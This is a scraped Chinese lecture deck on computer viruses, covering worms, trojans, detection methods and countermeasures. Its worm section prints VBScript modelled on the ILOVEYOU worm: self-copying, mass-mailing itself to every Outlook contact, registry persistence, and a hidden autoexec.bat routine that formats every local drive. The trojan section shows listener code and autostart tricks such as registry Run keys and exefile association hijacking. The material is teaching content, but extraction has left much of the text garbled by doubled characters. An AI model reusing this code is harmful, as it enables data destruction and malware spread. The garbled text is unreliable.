第4章_計算機病毒_第1頁
第4章_計算機病毒_第2頁
第4章_計算機病毒_第3頁
第4章_計算機病毒_第4頁
第4章_計算機病毒_第5頁
已閱讀5頁,還剩34頁未讀, 繼續(xù)免費閱讀

下載本文檔

版權(quán)說明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請進行舉報或認領(lǐng)

文檔簡介

1、 第第4 4章章 計算機病毒計算機病毒第四章第四章 計算機病毒計算機病毒 4.1 概述概述 4.2 計算機病毒的特征及分類計算機病毒的特征及分類 4.3常見的病毒類型常見的病毒類型 4.4計算機病毒制作與反病毒技術(shù)計算機病毒制作與反病毒技術(shù) 第第4 4章章 計算機病毒計算機病毒4.1 4.1 概述概述 帶有惡意目的的破壞程序帶有惡意目的的破壞程序,稱為惡意代碼。稱為惡意代碼。 計算機病毒屬于惡意代碼的一種計算機病毒屬于惡意代碼的一種; 在廣義上,計算機病毒就是各種惡意代碼的在廣義上,計算機病毒就是各種惡意代碼的統(tǒng)稱。統(tǒng)稱。 第第4 4章章 計算機病毒計算機病毒4.1 概述 計算機病毒最早是由美

2、國南加州大學的Fred Cohen提出的。 在1983年編寫,小程序,自我復制,并能在計算機中傳播。無害,潛伏,傳染。 Fred Cohen博士對計算機病毒的定義:“病毒是一種靠修改其他程序來插入或進行自身拷貝,從而感染其他程序的一段程序。” 第第4 4章章 計算機病毒計算機病毒4.1 概述概述 在中華人民共和國計算機信息系統(tǒng)安全保護條例中計算機病毒被定義為: “編制或在計算機程序中插入的破壞計算機功能或者破壞數(shù)據(jù),影響計算機使用并且能夠自我復制的一組計算機指令或者程序代碼”。 計算機病毒是一個程序,一段可執(zhí)行代碼。 第第4 4章章 計算機病毒計算機病毒4.1 概述概述 計算機病毒的發(fā)展 19

3、49年馮諾伊曼,在論文復雜自動裝置的理論及組織的進行里給出了計算機病毒的雛形。 1983年第一個病毒產(chǎn)生 1986年P(guān)akistan 病毒 1988年蠕蟲病毒 1991年病毒用于海灣戰(zhàn)爭實戰(zhàn) 第第4 4章章 計算機病毒計算機病毒1996年 宏病毒 1998年 CIH病毒2007年 熊貓燒香病毒2009年“死牛”病毒2010年 “鬼影”病毒4.1 概述概述 第第4 4章章 計算機病毒計算機病毒4.1 概述概述 計算機病毒的危害計算機病毒的危害(1)占用磁盤空間,破壞數(shù)據(jù)信息(2)干擾系統(tǒng)的正常運行(3)心理方面的影響 第第4 4章章 計算機病毒計算機病毒4.2 計算機病毒的特征及分類計算機病毒的

4、特征及分類 計算機病毒特征計算機病毒特征 1. 傳染性傳染性2. 破壞性破壞性3. 隱蔽性隱蔽性 4. 寄生性寄生性 5. 可觸發(fā)性可觸發(fā)性 計算機病毒計算機病毒的基本特征的基本特征 第第4 4章章 計算機病毒計算機病毒按病毒按寄生方式分類按病毒按寄生方式分類 網(wǎng)絡(luò)病毒網(wǎng)絡(luò)病毒 文件病毒文件病毒 引導型病毒引導型病毒 混合型病毒混合型病毒 按傳播媒介分類按傳播媒介分類 單機病毒單機病毒 網(wǎng)絡(luò)病毒網(wǎng)絡(luò)病毒 按病毒破壞性分類按病毒破壞性分類 按計算機病毒的鏈接方式分類按計算機病毒的鏈接方式分類 按病毒攻擊的操作系統(tǒng)分類按病毒攻擊的操作系統(tǒng)分類 按病毒的攻擊類型分類按病毒的攻擊類型分類 4.3.1

5、引導型與文件型病毒引導型與文件型病毒 第第4 4章章 計算機病毒計算機病毒4.3.1 引導型與文件型病毒引導型與文件型病毒 引導型病毒引導型病毒專門感染磁盤引導扇區(qū)或硬盤主引導區(qū)。專門感染磁盤引導扇區(qū)或硬盤主引導區(qū)。按其寄生對象可分為:按其寄生對象可分為: MBRMBR(主引導區(qū))病毒(主引導區(qū))病毒 BRBR(引導區(qū))病毒。(引導區(qū))病毒。引導型病毒一般通過修改引導型病毒一般通過修改intint 13h 13h中斷向量將病毒傳染中斷向量將病毒傳染給軟盤,而新的給軟盤,而新的intint 13h 13h中斷向量地址指向內(nèi)存高端的中斷向量地址指向內(nèi)存高端的病毒程序。病毒程序。引導型病毒的寄生對象

6、相對固定。引導型病毒的寄生對象相對固定。 第第4 4章章 計算機病毒計算機病毒 文件型病毒文件型病毒 通過文件系統(tǒng)進行感染的病毒統(tǒng)稱文件型病毒。 EXE文件病毒。文件病毒。 將自身代碼添加在宿主程序中,通過修改指令指針的方式,指向病毒起始位置來獲取控制權(quán)。 PE病毒病毒 當前產(chǎn)生重大影響的病毒類型,如“CIH”、“尼姆達”、“求職信”、“中國黑客”等。這類病毒主要感染W(wǎng)indows系統(tǒng)中的PE文件格式文件(如EXE, SCR, DLL等) 。4.3.1 引導型與文件型病毒引導型與文件型病毒 第第4 4章章 計算機病毒計算機病毒 蠕蟲蠕蟲 通過網(wǎng)絡(luò)傳播的惡意代碼。與文件型病毒和引導性病毒不同,蠕

7、蟲不利用文件寄生,也不感染引導區(qū),蠕蟲的感染目標是網(wǎng)絡(luò)中的所有計算機。 4.3.2 蠕蟲與木馬蠕蟲與木馬 第第4 4章章 計算機病毒計算機病毒蠕蟲的主要特點:蠕蟲的主要特點:(1) (1) 主動攻擊。主動攻擊。蠕蟲在本質(zhì)上已變?yōu)楹诳腿肭值墓ぞ?,從漏洞掃描到攻擊系統(tǒng),再到復制副本,整個過程全部由蠕蟲自身主動完成。(2) (2) 傳播方式多樣。傳播方式多樣。包括文件、電子郵件、Web服務(wù)器、網(wǎng)頁和網(wǎng)絡(luò)共享等。(3) (3) 制作技術(shù)不同于傳統(tǒng)的病毒。制作技術(shù)不同于傳統(tǒng)的病毒。許多蠕蟲病毒是利用當前最新的編程語言和編程技術(shù)來實現(xiàn)的,容易修改以產(chǎn)生新的變種。(4) (4) 行蹤隱蔽。行蹤隱蔽。蠕蟲在傳

8、播過程中不需要像傳統(tǒng)病毒那樣要用戶的輔助工作,所以在蠕蟲傳播的過程中,用戶很難察覺。(5) (5) 反復性。反復性。如果沒有修復系統(tǒng)漏洞,重新接入到網(wǎng)絡(luò)的計算機仍然有被重新感染的危險。 4.3.2 蠕蟲與木馬蠕蟲與木馬 第第4 4章章 計算機病毒計算機病毒木馬木馬 一種典型的黑客程序,它是一種基于遠程控制的黑客工具。 通過木馬,攻擊者可以遠程竊取用戶計算機上的所有文件、查看系統(tǒng)消息、竊取用戶口令、篡改文件和數(shù)據(jù)、接收執(zhí)行非授權(quán)者的指令、刪除文件甚至格式化硬盤。 4.3.2 蠕蟲與木馬蠕蟲與木馬 第第4 4章章 計算機病毒計算機病毒 木馬實際上是一個C/S結(jié)構(gòu)的程序:服務(wù)端程序+客戶端程序。 以

9、冰河程序為例,被控制端可視為一臺服務(wù)器運行G_Server.exe服務(wù)程序,而控制端是一臺客戶機安裝了G_Client.exe控制程序??蛻舳讼蚍?wù)端的端口提出連接請求,服務(wù)段的相應程序就會自動運行,響應客戶端的請求。4.3.2 蠕蟲與木馬蠕蟲與木馬 第第4 4章章 計算機病毒計算機病毒木馬的傳播方式:木馬的傳播方式:(1)以郵件附件的形式傳播??刂贫藢⒛抉R程序偽裝后,捆綁在小游)以郵件附件的形式傳播??刂贫藢⒛抉R程序偽裝后,捆綁在小游戲上,或者將木馬程序的圖標直接修改為戲上,或者將木馬程序的圖標直接修改為html,txt,jpg等文件的圖標,然等文件的圖標,然后將該木馬程序添加到附件中,發(fā)送

10、給收件人。后將該木馬程序添加到附件中,發(fā)送給收件人。(2)通過聊天軟件的文件發(fā)送功能。利用聊天對話的過程中,利用文)通過聊天軟件的文件發(fā)送功能。利用聊天對話的過程中,利用文件傳送功能發(fā)送偽裝后的木馬程序給對方。件傳送功能發(fā)送偽裝后的木馬程序給對方。(3)通過軟件下載網(wǎng)站傳播。有些網(wǎng)站可能會被攻擊者利用,將木馬)通過軟件下載網(wǎng)站傳播。有些網(wǎng)站可能會被攻擊者利用,將木馬捆綁在軟件上,用戶下載軟件后如果沒有進行安全檢查就進行安裝,木捆綁在軟件上,用戶下載軟件后如果沒有進行安全檢查就進行安裝,木馬就會駐留內(nèi)存。馬就會駐留內(nèi)存。(4)通過病毒和蠕蟲傳播。某些病毒和蠕蟲本身就具備木馬的功能,)通過病毒和蠕

11、蟲傳播。某些病毒和蠕蟲本身就具備木馬的功能,或可能成為木馬的宿主而傳播木馬。或可能成為木馬的宿主而傳播木馬。(5)通過帶木馬的磁盤)通過帶木馬的磁盤/光盤傳播。光盤傳播。4.3.2 蠕蟲與木馬蠕蟲與木馬 第第4 4章章 計算機病毒計算機病毒宏病毒宏病毒 宏病毒是使用宏語言編寫的程序。 宏病毒利用一些數(shù)據(jù)處理系統(tǒng)內(nèi)置宏命令的特性,把特定的宏命令代碼附加在指定的文件上,通過文件的打開或關(guān)閉來獲取系統(tǒng)的控制權(quán),同時實現(xiàn)宏命令在不同文件之間的共享和傳遞,以實現(xiàn)傳染。 4.3.3 其他病毒介紹其他病毒介紹 第第4 4章章 計算機病毒計算機病毒網(wǎng)頁病毒網(wǎng)頁病毒 網(wǎng)頁病毒使用腳本語言編寫的惡意代碼,利用瀏覽

12、器的漏洞來實現(xiàn)病毒植入。當用戶登錄某些含有網(wǎng)頁病毒的網(wǎng)站時,網(wǎng)頁病毒便被悄悄激活,這些病毒一旦激活,可以利用系統(tǒng)的一些資源進行破壞。4.3.3 其他病毒介紹其他病毒介紹 第第4 4章章 計算機病毒計算機病毒4.4計算機病毒制作與反病毒技術(shù)計算機病毒制作與反病毒技術(shù) 4.4.1計算機病毒的一般構(gòu)成 4.4.2 計算機病毒制作技術(shù) 4.4.3 病毒的檢測與查殺 第第4 4章章 計算機病毒計算機病毒4.4.1計算機病毒的一般構(gòu)成計算機病毒的一般構(gòu)成1安裝模塊安裝模塊 病毒程序通過自身的程序?qū)崿F(xiàn)自啟動并安裝到系統(tǒng)中,不同類型病毒程序病毒程序通過自身的程序?qū)崿F(xiàn)自啟動并安裝到系統(tǒng)中,不同類型病毒程序用不同

13、安裝方法。用不同安裝方法。2傳染模塊傳染模塊 (1)傳染控制部分。病毒一般都有一個控制條件,一旦滿足這個條件就開)傳染控制部分。病毒一般都有一個控制條件,一旦滿足這個條件就開始感染。例如,病毒先判斷某個文件是否是始感染。例如,病毒先判斷某個文件是否是.EXE文件,如果是再進行傳文件,如果是再進行傳染,否則再尋找下一個文件;染,否則再尋找下一個文件; (2)傳染判斷部分。每個病毒程序都有一個標記,在傳染時將判斷這個標)傳染判斷部分。每個病毒程序都有一個標記,在傳染時將判斷這個標記,如果磁盤或者文件已經(jīng)被傳染就不再傳染,否則就要傳染了;記,如果磁盤或者文件已經(jīng)被傳染就不再傳染,否則就要傳染了; (

14、3)傳染操作部分。在滿足傳染條件時進行傳染操作。)傳染操作部分。在滿足傳染條件時進行傳染操作。 3破壞模塊破壞模塊 計算機病毒的最終目的是進行破壞,其破壞的基本手段就是刪除文件或數(shù)計算機病毒的最終目的是進行破壞,其破壞的基本手段就是刪除文件或數(shù)據(jù)。破壞模塊包括兩部分:一是激發(fā)控制,另一個就是破壞操作。據(jù)。破壞模塊包括兩部分:一是激發(fā)控制,另一個就是破壞操作?;灸;灸K塊 第第4 4章章 計算機病毒計算機病毒4.4.2 計算機病毒制作技術(shù)計算機病毒制作技術(shù)計算機病毒制作技術(shù)計算機病毒制作技術(shù) 1.1. 采用自加密技術(shù)采用自加密技術(shù)2.2. 采用變形技術(shù)采用變形技術(shù)3.3. 采用特殊的隱形技術(shù)

15、采用特殊的隱形技術(shù)4.4. 對抗計算機病毒防范系統(tǒng)對抗計算機病毒防范系統(tǒng)5.5. 反跟蹤技術(shù)反跟蹤技術(shù) 第第4 4章章 計算機病毒計算機病毒4.4.3 病毒的檢測與查殺病毒的檢測與查殺 病毒的檢測病毒的檢測 (1) 特征代碼法(2) 校驗和法 (3) 行為監(jiān)測法(4)軟件模擬法 第第4 4章章 計算機病毒計算機病毒4.4.3 病毒的檢測與查殺病毒的檢測與查殺1 1特征代碼法特征代碼法從病毒程序中抽取一段獨一無二、足以代表該病毒特征的二進制程序代碼,從病毒程序中抽取一段獨一無二、足以代表該病毒特征的二進制程序代碼,并將這段代碼作為判斷該病毒的依據(jù),這就是所謂的病毒特征代碼。并將這段代碼作為判斷該

16、病毒的依據(jù),這就是所謂的病毒特征代碼。采用病毒特征代碼法的檢測工具,必須不斷更新病毒資料庫,否則檢測工具采用病毒特征代碼法的檢測工具,必須不斷更新病毒資料庫,否則檢測工具便會過期老化,逐漸失去實用價值。便會過期老化,逐漸失去實用價值。特征代碼法的優(yōu)點特征代碼法的優(yōu)點 檢測準確檢測準確 快速快速 可識別病毒的名稱可識別病毒的名稱 最簡單最簡單 開銷最小開銷最小缺點缺點 不能檢測未知病毒、變種病毒和隱蔽性病毒,需定期更新病毒資料庫,具有滯后不能檢測未知病毒、變種病毒和隱蔽性病毒,需定期更新病毒資料庫,具有滯后性。性。 第第4 4章章 計算機病毒計算機病毒4.4.3 病毒的檢測與查殺病毒的檢測與查殺

17、2校驗和法校驗和法 校驗和法是根據(jù)文件的內(nèi)容,計算其校驗和,并將所有文件的校驗和放在資料庫中。檢測時將文件現(xiàn)有內(nèi)容的校驗和與資料庫中的校驗和做比較,若不同則判斷為被感染病毒。 運用校驗和法查病毒可以采用三種方式: (1)在檢測病毒工具中加入校驗和法。(2)在應用程序中加入校驗和自我檢查功能。 (3)將校驗和檢查程序常駐內(nèi)存。 第第4 4章章 計算機病毒計算機病毒4.4.3 病毒的檢測與查殺病毒的檢測與查殺3 3行為監(jiān)測法行為監(jiān)測法 行為監(jiān)測法是將病毒中比較特殊的共同行為歸納起來。當程序運行時監(jiān)視其行為,若發(fā)現(xiàn)類似病毒的行為,立即報警。4 4軟件模擬法軟件模擬法 用程序代碼虛擬一個CPU、各個寄

18、存器、硬件端口也虛擬出來,調(diào)入被調(diào)的“樣本”,通過內(nèi)存和寄存器以及端口的變化來了解程序的執(zhí)行情況。將病毒放到虛擬機中執(zhí)行,則病毒的傳染和破壞等動作一定會被反映出來。 第第4 4章章 計算機病毒計算機病毒蠕蟲病毒分析蠕蟲病毒分析 蠕蟲病毒是目前對計算機威脅最大的網(wǎng)絡(luò)病毒,蠕蟲病毒的特征:1蠕蟲病毒的自我復制能力蠕蟲病毒的自我復制能力 用VB腳本語言編寫實現(xiàn)自我復制程序。 Set objFs=CreateObject(Scripting.FileSystemObject) 創(chuàng)建一個文件系統(tǒng)對象 Set fso=objFs.CreateTextFile(c:virus.txt,1) 通過文件系統(tǒng)對象

19、的方法創(chuàng)建了一個TXT文件。 如果把這兩行保存成為.vbs的VB腳本文件,點擊鼠標就會在C盤中創(chuàng)建一個TXT文件了。如果把第二行改為: objFs.GetFile(WScript.ScriptFullName).Copy (“C:virus.vbs”) 就可以實現(xiàn)將自身復制到C盤virus.vbs這個文件上。4.4.3 病毒的檢測與查殺病毒的檢測與查殺 第第4 4章章 計算機病毒計算機病毒2蠕蟲病毒的傳播性蠕蟲病毒的傳播性Set objOA=Wscript.CreateObject (“Outlook.Application”)創(chuàng)建一個OUTLOOK應用的對象Set objMapi=objOA

20、.GetNameSpace (“MAPI”) 取得MAPI名字空間 For i=1 to objMapi.AddressLists.Count 遍歷地址簿 Set objAddList=objMapi.AddressLists (i) For j=1 To objAddList. AddressEntries.Count Set objMail=objOA.CreateItem (0) objMail.Recipients.Add (objAddList. AddressEntries (j) 取得收件人郵件地址objMail.Subject=“你好!” 設(shè)置郵件主題 objMail.Body

21、=“這次給你的附件,是我的新文檔!” 設(shè)置信件內(nèi)容objMail.Attachments.Add (“c:virus.vbs”) 把自己作為附件擴散出去 objMail.Send 發(fā)送郵件 Next Next Set objMapi=Nothing 清空objMapi變量,釋放資源 Set objOA=Nothing 清空objOA變量4.4.3 病毒的檢測與查殺病毒的檢測與查殺 第第4 4章章 計算機病毒計算機病毒3 3蠕蟲病毒的潛伏性蠕蟲病毒的潛伏性 以下是愛蟲病毒中的部分代碼:On Error Resume Next 容錯語句,避免程序崩潰dim wscr,rr set wscr=Cre

22、ateObject (WScript.Shell)激活 WScript.Shell 對象rr=wscr.RegRead(HKEY_CURRENT_USERSoftwareMicrosoftWindows Scripting HostSettingsTimeout)讀入注冊表中的超時鍵值if (rr=1) then 超時設(shè)置wscr.RegWrite “HKEY_CURRENT_USERSoftwareMicrosoftWindowsScripting HostSettingsTimeout”,0,“REG_DWORD”end if4.4.3 病毒的檢測與查殺病毒的檢測與查殺 第第4 4章章 計

23、算機病毒計算機病毒下面是修改注冊表,使得每次系統(tǒng)啟動時自動執(zhí)行腳本文件。regcreate“HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunMSKernel32“,dirsystem&”MSKernel32.vbs”regcreate “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunServicesWin32DLL,“dirwin&”Win32DLL.vbs”4蠕蟲病毒的觸發(fā)性蠕蟲病毒的觸發(fā)性 x=time() if x=xx.xx.xx

24、 then end if4.4.3 病毒的檢測與查殺病毒的檢測與查殺 第第4 4章章 計算機病毒計算機病毒5蠕蟲病毒的破壞性蠕蟲病毒的破壞性sub killc ()破壞硬盤的過程On Error Resume Next 容錯語句,避免程序崩潰dim fs,auto,disc,ds,ss,i,x,dirSetfs=CreateObject(“Scripting.FileSystemObject”)Set auto = fs.CreateTextFile (“c:Autoexec.bat”, True)建立或修改自動批處理auto.WriteLine (“echo off”) 屏蔽掉刪除的進程au

25、to.WriteLine (“Smartdrv”) 加載磁盤緩沖 Set disc = fs.Drives 得到磁盤驅(qū)動器的集合For Each ds in discIf ds.DriveType = 2 Then 如果磁盤驅(qū)動器是本地盤 ss = ss & ds.DriveLetter 就將符號連在一起End IfNextss=LCase (StrReverse (Trim (ss)得到符號串的反向小寫形式 4.4.3 病毒的檢測與查殺病毒的檢測與查殺 第第4 4章章 計算機病毒計算機病毒For i=1 to Len (ss)遍歷每個磁盤驅(qū)動器x=Mid (ss,i,1) 讀每個磁盤

26、驅(qū)動器的符號auto.WriteLine (“format/autotest/q/u “&x&”:”)反向 (從Z:到A:)自動格式化磁盤驅(qū)動器nextauto.Close關(guān)閉批處理文件set dir=fs.GetFile (“c:Autoexec.bat”)dir.attributes=dir.attributes+2 將自動批處理文件改為隱藏4.4.3 病毒的檢測與查殺病毒的檢測與查殺 第第4 4章章 計算機病毒計算機病毒應對應對蠕蟲病毒蠕蟲病毒的對策的對策復制功能的控制禁止“FileSystemObject”的使用,可以有效控制VBS病毒的傳播具體操作方法:用regsvr

27、32 scrrun.dll /u這條命令就可以禁止文件系統(tǒng)對象。破解病毒的破壞性。把本地的帶有破壞性的程序改名字,比如把改成,那樣病毒的編輯者就無發(fā)實現(xiàn)用調(diào)用本地命令來實現(xiàn)這一功能。破解病毒的潛伏性及觸發(fā)性功能模塊關(guān)閉Wscript.exe的程序在后臺運行在“開始”菜單的“運行”里輸入“Wscript”,然后會彈出一個窗體。單擊“經(jīng)過以下數(shù)秒終止腳本”前面的復選框,使復選框前面打起鉤,然后調(diào)整下方的時間設(shè)為最小值即可。這樣可以破解一部分這樣的病毒的潛伏,消除潛伏性自然觸發(fā)性就破解了。由于蠕蟲病毒大多是用VBScript腳本語言編寫的,而VBScript代碼是通過Windows Script H

28、ost來解釋執(zhí)行的,因此將Windows Script Host刪除/禁止,就再也不用擔心這些用VBS和JS編寫的病毒了!即刪除、更名WScript.exe和JScript.exe4.4.3 病毒的檢測與查殺病毒的檢測與查殺 第第4 4章章 計算機病毒計算機病毒4.4.3 病毒的檢測與查殺病毒的檢測與查殺木馬的基本原理木馬的基本原理 木馬本質(zhì)上只是一個網(wǎng)絡(luò)客戶/服務(wù)程序(Client/Server),一般有兩部分組成:服務(wù)端程序,另一個是客戶端程序。以冰河程序為例,在VB中,可以使用WinSock控件來編寫網(wǎng)絡(luò)客戶服務(wù)程序,實現(xiàn)方法如下:服務(wù)端:服務(wù)端: G_ Server.LocalPort

29、=7626(冰河的默認端口,可以改為別的值) G_ Server.Listen(等待連接)客戶端:客戶端: G_ Client.RemoteHost=ServerIP(設(shè)遠端地址為服務(wù)器地址) G _Client.RemotePort=7626(設(shè)遠程端口為冰河的默認端口) G _Client.Connect(調(diào)用Winsock控件的連接方法) 其中,G_Server和G_Client均為Winsock控件。 第第4 4章章 計算機病毒計算機病毒4.4.3 病毒的檢測與查殺病毒的檢測與查殺木馬的啟動方式木馬的啟動方式首先黑客將木馬程序捆綁在一些常用的軟件上,將木馬悄悄安裝到計算機中。在Wind

30、ows系統(tǒng)中,黑客實現(xiàn)程序自啟動的方法很多,常見方法:1 1修改系統(tǒng)配置文件修改系統(tǒng)配置文件通過修改系統(tǒng)配置文件System.ini、Win.ini來實現(xiàn)木馬的自啟動。Win.ini有兩個數(shù)據(jù)項“l(fā)oad = ”和“run = ”,如果木馬需要在系統(tǒng)啟動后運行一個程序,只要在“l(fā)oad = ”和“run = ”后添加該程序的程序名即可2 2修改注冊表修改注冊表修改注冊表是木馬最常用的攻擊和入侵手段: HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrent VersionRun*的鍵。如果想讓程序在系統(tǒng)啟動的過程中啟動,向該目錄添加一個子項即可。 第第

31、4 4章章 計算機病毒計算機病毒4.4.3 病毒的檢測與查殺病毒的檢測與查殺3通過文件關(guān)聯(lián)啟動通過文件關(guān)聯(lián)啟動 通過.exe文件關(guān)聯(lián)exefile,將注冊表中HKEY_CLASSES_ROOTexefileshellopencommand的默認“%1”%*”改成“x: xxxbsy.exe”(木馬程序的路徑),讓系統(tǒng)在執(zhí)行.exe程序時就自動運行木馬程序bsy.exe。通常修改的還有.txt文件關(guān)聯(lián)txtfile,只要讀取.txt文本文件就執(zhí)行木馬程序等。4利用利用Autorun.inf文件自動運行功能文件自動運行功能 在E盤根目錄下新建一個Autorun.inf文件,用記事本打開它,輸入如下內(nèi)容: autorun open=Notepad.exe 保存后重新啟動,進入“我的電腦”,然后雙擊E盤盤符,記事本被打開了,而E盤卻沒有打開。 5利用對動態(tài)連接庫(利用對動態(tài)連接庫(DLL)的調(diào)用)的調(diào)用 黑客可以將木馬程序捆綁到DLL上(如kernel32.dll),當用戶使用API函數(shù)時,黑客就會先啟動木馬程序,然后再調(diào)用真正的函數(shù)完成API函數(shù)功能。 第第4 4章章 計算機病毒計算機病毒4.4.3 病毒的檢測與查殺病毒的檢測與查殺木馬的查殺木馬的查殺1查看注冊表查看注冊表 在HKEY_LOCAL_MACHINESOFTWAREMicrosoftWi

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁內(nèi)容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網(wǎng)僅提供信息存儲空間,僅對用戶上傳內(nèi)容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對任何下載內(nèi)容負責。
  • 6. 下載文件中如有侵權(quán)或不適當內(nèi)容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

最新文檔

評論

0/150

提交評論